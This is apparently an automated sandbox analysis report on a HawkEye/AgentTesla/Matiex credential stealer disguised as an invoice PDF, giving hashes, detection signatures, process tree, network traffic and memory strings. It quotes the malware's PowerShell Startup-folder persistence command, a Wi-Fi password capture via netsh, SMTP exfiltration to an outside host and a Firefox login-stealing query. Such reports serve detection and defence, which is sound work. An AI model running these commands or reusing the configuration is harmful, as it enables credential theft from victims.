
Analysis Report PO_Invoices_pdf.exe

Overview

General Information

Sample Name: PO_Invoices_pdf.exe
Analysis ID: 347154
MD5: 59d7d8d5dd3e0055e7c0dcc75897f569
SHA1: b249b28d088d54e971e2d9d8b2688440f8e6d513
SHA256: ef715cd322f0a805a68840b215c062f2e254977170a11c6800d836eac781fabb
Tags: exe, HawkEye, Yahoo

Most interesting Screenshot:

Detection

HawkEye, AgentTesla, MailPassView, Matiex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected AgentTesla
Yara detected AntiVM_3
Yara detected HawkEye Keylogger
Yara detected MailPassView
Yara detected Matiex Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the startup folder
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Adds / modifies Windows certificates
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • PO_Invoices_pdf.exe (PID: 5372 cmdline: 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' MD5: 59D7D8D5DD3E0055E7C0DCC75897F569)
    • powershell.exe (PID: 5904 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 4888 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • hawkgoods.exe (PID: 3724 cmdline: 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0 MD5: FFDB58533D5D1362E896E96FB6F02A95)
        • dw20.exe (PID: 6684 cmdline: dw20.exe -x -s 2164 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
        • vbc.exe (PID: 6852 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 6868 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 7028 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1996 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • origigoods40.exe (PID: 6172 cmdline: 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0 MD5: AE36F0D16230B9F41FFECBD3C5B1D660)
      • Matiexgoods.exe (PID: 6264 cmdline: 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0 MD5: 80C61B903400B534858D047DD0919F0E)
        • netsh.exe (PID: 1744 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • origigoods20.exe (PID: 6352 cmdline: 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0 MD5: 61DC57C6575E1F3F2AE14C1B332AD2FB)
  • I$s#$lT3ssl.exe (PID: 1808 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' MD5: 59D7D8D5DD3E0055E7C0DCC75897F569)
    • powershell.exe (PID: 6908 cmdline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 4828 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • hawkgoods.exe (PID: 5440 cmdline: 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0 MD5: FFDB58533D5D1362E896E96FB6F02A95)
        • dw20.exe (PID: 5252 cmdline: dw20.exe -x -s 2092 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
        • vbc.exe (PID: 5776 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 6108 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 4776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 940 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • origigoods40.exe (PID: 3080 cmdline: 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0 MD5: AE36F0D16230B9F41FFECBD3C5B1D660)
      • Matiexgoods.exe (PID: 6532 cmdline: 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0 MD5: 80C61B903400B534858D047DD0919F0E)
      • origigoods20.exe (PID: 7160 cmdline: 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0 MD5: 61DC57C6575E1F3F2AE14C1B332AD2FB)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Threatname: Agenttesla

{"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "", "From: ": ""}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\origigoods20.exe | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
C:\Users\user\AppData\Local\Temp\origigoods40.exe | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | JoeSecurity_Matiex | Yara detected Matiex Keylogger | Joe Security | -
dropped/hawkgoods.exe | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp | 0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
C:\Users\user\AppData\Local\Temp\hawkgoods.exe | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp | 0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
(5 of 10 entries shown)

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
00000005.00000003.285132773.0000000003DE1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
0000001F.00000000.423374232.0000000000722000.00000002.00020000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
0000001A.00000003.425880345.0000000003A2D000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
00000023.00000002.465758929.0000000000400000.00000040.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | -
(5 of 99 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
17.2.vbc.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security | -
7.0.origigoods40.exe.c30000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
35.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | -
28.2.origigoods40.exe.e20000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
31.2.origigoods20.exe.720000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
(5 of 271 entries shown)

                            Sigma Overview

System Summary:

Sigma detected: Capture Wi-Fi password
Source: Process started | Author: Joe Security
Data:
  Command: 'netsh' wlan show profile
  CommandLine: 'netsh' wlan show profile
  CommandLine|base64offset|contains: V
  Image: C:\Windows\SysWOW64\netsh.exe
  NewProcessName: C:\Windows\SysWOW64\netsh.exe
  OriginalFileName: C:\Windows\SysWOW64\netsh.exe
  ParentCommandLine: 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
  ParentImage: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
  ParentProcessId: 6264
  ProcessCommandLine: 'netsh' wlan show profile
  ProcessId: 1744

                            Signature Overview


AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Avira: detection malicious, Label: TR/Redcap.jajcu
Found malware configuration
Source: RegAsm.exe.4888.5.memstr | Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
Source: hawkgoods.exe.3724.6.memstr | Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.privateemail.com:587", "Password: ": "", "From: ": ""}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Metadefender: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Metadefender: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Metadefender: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | ReversingLabs: Detection: 19%
Multi AV Scanner detection for submitted file
Source: PO_Invoices_pdf.exe | ReversingLabs: Detection: 17%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: PO_Invoices_pdf.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 30.0.Matiexgoods.exe.bd0000.0.unpack | Avira: Label: TR/Redcap.jajcu
Source: 8.2.Matiexgoods.exe.f70000.0.unpack | Avira: Label: TR/Redcap.jajcu
Source: 27.2.hawkgoods.exe.a40000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 27.2.hawkgoods.exe.a40000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 6.0.hawkgoods.exe.2f0000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 6.0.hawkgoods.exe.2f0000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 30.2.Matiexgoods.exe.bd0000.0.unpack | Avira: Label: TR/Redcap.jajcu
Source: 26.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 26.2.RegAsm.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 26.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Redcap.jajcu
Source: 26.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 26.2.RegAsm.exe.4031bf.2.unpack | Avira: Label: TR/Inject.vcoldi
Source: 8.0.Matiexgoods.exe.f70000.0.unpack | Avira: Label: TR/Redcap.jajcu
Source: 5.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 5.2.RegAsm.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 5.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Redcap.jajcu
Source: 5.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.2.hawkgoods.exe.2f0000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 6.2.hawkgoods.exe.2f0000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack | Avira: Label: TR/Inject.vcoldi
Source: 27.0.hawkgoods.exe.a40000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 27.0.hawkgoods.exe.a40000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack | Avira: Label: TR/Inject.vcoldi
Source: 5.2.RegAsm.exe.4031bf.1.unpack | Avira: Label: TR/Inject.vcoldi
Source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack | Avira: Label: TR/Inject.vcoldi
Source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack | Avira: Label: TR/Inject.vcoldi

Compliance:

Uses 32bit PE files
Source: PO_Invoices_pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.7:49733 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.7:49785 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: PO_Invoices_pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb | source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbHs | source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
Source: Binary string: mscorlib.pdbTD~1\AppData\Local\Temp\hawkgoods.exeAAGZ | source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb | source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbm | source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
Source: Binary string: RunPE.pdb | source: PO_Invoices_pdf.exe, 00000000.00000002.277173827.00000000030A1000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb | source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll | source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
Source: Binary string: indows\mscorlib.pdbpdblib.pdb | source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb | source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
Source: Binary string: C:\Windows\mscorlib.pdbl | source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb | source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb | source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
Source: Binary string: symbols\dll\mscorlib.pdb7w | source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
Source: Binary string: oC:\Windows\mscorlib.pdb | source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb | source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb | source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp
Source: Binary string: mscorrc.pdb | source: hawkgoods.exe, 00000006.00000002.391117104.0000000004E20000.00000002.00000001.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} | source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp
May infect USB drives
Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp | Binary or memory string: autorun.inf
Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp | Binary or memory string: [autorun]
Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp | Binary or memory string: autorun.inf
Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp | Binary or memory string: [autorun]
Source: hawkgoods.exe | Binary or memory string: autorun.inf
Source: hawkgoods.exe | Binary or memory string: [autorun]
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] (15 identical entries)
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then call 04B31B20h (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then mov esp, ebp
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 4x nop then jmp 04B31A73h (2 identical entries)

                            Networking:

                            barindex
                            May check the online IP address of the machineShow sources
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: whatismyipaddress.com
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: unknownDNS query: name: checkip.dyndns.org
                            Source: global trafficTCP traffic: 192.168.2.7:49741 -> 199.193.7.228:587
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 131.186.113.70 131.186.113.70
                            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                            Source: global trafficTCP traffic: 192.168.2.7:49741 -> 199.193.7.228:587
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                            Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.7:49733 version: TLS 1.0
                            Source: unknownHTTPS traffic detected: 104.21.19.200:443 -> 192.168.2.7:49785 version: TLS 1.0
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_00C6A14A recv,
                            Source: global traffic. HTTP traffic detected, the following sequence observed twice: GET / HTTP/1.1  Host: whatismyipaddress.com  Connection: Keep-Alive, followed by five requests GET / HTTP/1.1  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)  Host: checkip.dyndns.org (the first of the five with Connection: Keep-Alive)
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
